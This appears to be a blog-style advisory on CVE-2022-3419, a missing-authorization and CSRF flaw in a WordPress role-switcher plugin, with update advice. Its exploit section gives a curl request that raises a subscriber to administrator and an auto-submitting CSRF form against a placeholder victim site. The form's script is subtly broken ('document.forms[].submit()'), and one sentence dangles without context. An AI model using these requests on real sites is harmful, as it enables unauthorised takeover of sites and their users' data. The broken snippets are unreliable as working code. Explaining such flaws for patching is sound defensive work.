CVE-2022-3419 - How Subscribers Can Become Admins in WordPress with the Automatic User Roles Switcher Plugin Vulnerability

WordPress plugins make running a site easier, but when security is poor, even the simplest plugin can cause a big problem. This is exactly what happened with the Automatic User Roles Switcher plugin before version 1.1.2, affected by a serious vulnerability: CVE-2022-3419. Here’s how it works, why it’s dangerous, and how you can protect your site.

What Is CVE-2022-3419?

CVE-2022-3419 is a vulnerability found in the Automatic User Roles Switcher WordPress plugin, versions before 1.1.2. Due to missing authorization and CSRF (Cross-Site Request Forgery) checks, any authenticated user (even a basic subscriber) could give themselves any role, including “Administrator.” Simply put, someone with barely any rights could take over your whole site.

It also misses protection against fake requests (no CSRF check).

So, a logged-in user just needs to send the right request, and suddenly they’re an admin.

The Exploit

Below is a simplified example of how a subscriber could exploit the bug. This example uses a POST request to the plugin’s vulnerable endpoint.

curl -i -s -k -X $'POST' \
    -H $'Cookie: wordpress_logged_in_xxx=subscriber_session_token;' \
    --data-binary $'user_id=YOUR_USER_ID&role=administrator' \
    $'https://victim-site.com/wp-admin/admin-ajax.php?action=change_user_role';

- Replace YOUR_USER_ID with your (attacker/subscriber) WordPress user ID.

CSRF Example

Because there is no CSRF protection, an attacker can trick a logged-in user into clicking a link or visiting a page that submits the request automatically:

<form method="POST" action="https://victim-site.com/wp-admin/admin-ajax.php?action=change_user_role">;
  <input type="hidden" name="user_id" value="3">
  <input type="hidden" name="role" value="administrator">
  <input type="submit" value="Click me!">
</form>
<script>document.forms[].submit();</script>

Even if the user is a low-level subscriber, they instantly gain admin access.

Who’s at Risk?

Any WordPress site running Automatic User Roles Switcher plugin version 1.1.1 or earlier is vulnerable.

Why Is This So Dangerous?

- Privilege Escalation: Attackers gain full access, can install backdoors, delete data, or compromise your entire site.

Immediate actions you MUST take

1. Update the Plugin: Upgrade to version 1.1.2 or higher.
2. Disable/Remove If Not Used: If you don’t need this plugin, it’s safer to delete it.

References & Further Reading

- NVD CVE-2022-3419 Detail
- WPScan Report
- Automatic User Roles Switcher Plugin
- MITRE CVE Record

Final Thoughts

Vulnerabilities like CVE-2022-3419 show why it’s so important to keep your WordPress plugins updated and to use only trustworthy extensions. A small plugin can open the door to big problems. Always audit your plugins, follow security news, and lock down user permissions on your site.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 15:49:00 UTC